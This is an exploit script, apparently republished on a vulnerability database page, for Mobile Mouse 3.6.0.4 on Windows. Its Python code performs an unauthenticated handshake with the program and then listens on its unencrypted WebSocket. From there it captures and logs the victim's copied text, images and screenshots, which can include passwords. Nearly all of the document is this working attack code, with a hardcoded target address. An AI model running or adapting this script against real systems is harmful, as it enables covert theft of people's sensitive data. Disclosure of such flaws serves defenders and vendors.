# Exploit Title: Mobile Mouse 3.6.0.4 Clipboard Data Exfiltration
# Date: 06/20/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 (Build 19044)
'''
Description:
attacker can intercept clipboard activity from a system running Mobile
Mouse 3.6.0.4. When the user copies text, images, or takes screenshots, the
data is transmitted over a WebSocket channel without encryption or
authentication, allowing passive exfiltration of sensitive information such
as passwords, or captured screens.
'''
import asyncio
import uuid
import websocket
import threading
import os
import time
import datetime
import re
import sys
target_ip = "192.168.8.105"
tcp_port = 9099
ws_url = f"ws://{target_ip}:35913"
output_dir = "output"
os.makedirs(output_dir, exist_ok=True)
EOR_CHAR = '\x1e'
EOF_CHAR = '\x04'
FILEINFO_MARKER = b'$$FILEINFO$$'
FILESTART_MARKER = b'$$FILESTART$$'
FILEEND_MARKER = b'$$FILEEND$$'
CLIP_RE = re.compile(r'^CLIPBOARDUPDATE\x1E(TEXT|IMAGE)\x1F(.*)$',
re.DOTALL)
class ImageReceiver:
def __init__(self):
self.state = "idle"
self.header_buffer = bytearray()
self.image_buffer = bytearray()
self.current_filename = None
self.pending_save = False
self.last_data_time = 0
def process_binary(self, data: bytes):
self.last_data_time = time.time()
if self.state == "idle":
self.header_buffer.extend(data)
if FILEINFO_MARKER in self.header_buffer and FILESTART_MARKER
in self.header_buffer:
i1 = self.header_buffer.find(FILEINFO_MARKER)
i2 = self.header_buffer.find(FILESTART_MARKER)
if i1 < i2:
info = self.header_buffer[i1 + len(FILEINFO_MARKER):i2]
try:
fn = info.split(b'\x1e', 1)[0].decode('utf-8',
'replace').strip()
except:
fn = f"unknown_{int(time.time())}.jpg"
self.current_filename = fn
print(f"[+] Receiving image: {fn}")
self.pending_save = True
self.image_buffer = bytearray(self.header_buffer[i2 +
len(FILESTART_MARKER):])
self.header_buffer.clear()
self.state = "image"
elif self.state == "image":
self.image_buffer.extend(data)
end = self.image_buffer.find(FILEEND_MARKER)
if end != -1:
img = self.image_buffer[:end]
self._save(img)
rem = self.image_buffer[end + len(FILEEND_MARKER):]
self._reset()
if rem:
self.process_binary(rem)
def check_timeout(self):
if self.state == "image" and self.pending_save:
if time.time() - self.last_data_time > 0.5:
self._save(self.image_buffer)
self._reset()
def _save(self, img_bytes: bytearray):
path = os.path.join(output_dir, self.current_filename)
with open(path, "wb") as f:
f.write(img_bytes)
print(f"[+] Image saved: {path}")
def _reset(self):
self.state = "idle"
self.header_buffer.clear()
self.image_buffer.clear()
self.current_filename = None
self.pending_save = False
def on_open(ws):
print("[+] WebSocket connected.")
ws.img_rcv = ImageReceiver()
def on_close(ws, code, msg):
print("[!] WebSocket closed.")
def save_text_log(text: str):
date_str = datetime.datetime.now().strftime("%Y%m%d")
time_str = datetime.datetime.now().strftime("%H:%M:%S")
log_filename = os.path.join(output_dir, f"clipboard_{date_str}.log")
with open(log_filename, "a", encoding="utf-8") as f:
f.write(f"[{time_str}] {text}\n")
def on_message(ws, message):
if isinstance(message, (bytes, bytearray)):
ws.img_rcv.process_binary(message)
return
text = message.strip()
m = CLIP_RE.match(text)
if not m:
return
kind, payload = m.group(1), m.group(2).strip()
if kind == "TEXT" and payload:
print(f"[+] Clipboard Text: {payload}")
save_text_log(payload)
elif kind == "IMAGE" and ws.img_rcv.pending_save:
if ws.img_rcv.current_filename == payload:
ws.img_rcv._save(ws.img_rcv.image_buffer)
ws.img_rcv._reset()
async def tcp_handshake():
print(f"[+] Connecting to TCP {target_ip}:{tcp_port} ...")
reader, writer = await asyncio.open_connection(target_ip, tcp_port)
field1 = "" # password if known
field2_guid = str(uuid.uuid4()).upper()
field3_device_type = "Desktop"
field4_version1 = "2"
field5_version2 = "2"
field6_version3_key =
"{length=32,bytes=0x0000000000000000000000000000000000000000000000000000000000000000}"
message = (
f"CONNECT{EOR_CHAR}"
f"{field1}{EOR_CHAR}"
f"{field2_guid}{EOR_CHAR}"
f"{field3_device_type}{EOR_CHAR}"
f"{field4_version1}{EOR_CHAR}"
f"{field5_version2}{EOR_CHAR}"
f"{field6_version3_key}{EOF_CHAR}"
)
writer.write(message.encode())
await writer.drain()
try:
response = await asyncio.wait_for(reader.read(1024), timeout=3.0)
decoded = response.decode(errors='ignore').strip()
if "Welcome" in decoded:
print("[+] TCP Connected")
elif "Please enter a password" in decoded:
print("[!] Password Protected!")
sys.exit(0)
else:
print("[!] Something went wrong")
except asyncio.TimeoutError:
print("[!] No response received. Proceeding anyway...")
writer.close()
await writer.wait_closed()
def start_websocket():
ws = websocket.WebSocketApp(
ws_url,
on_open=on_open,
on_message=on_message,
on_close=on_close
)
thr = threading.Thread(target=ws.run_forever, daemon=True)
thr.start()
try:
while thr.is_alive():
if hasattr(ws, 'img_rcv'):
ws.img_rcv.check_timeout()
thr.join(0.1)
except KeyboardInterrupt:
print("\n[!] Interrupted by user.")
ws.close()
def main():
asyncio.run(tcp_handshake())
start_websocket()
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation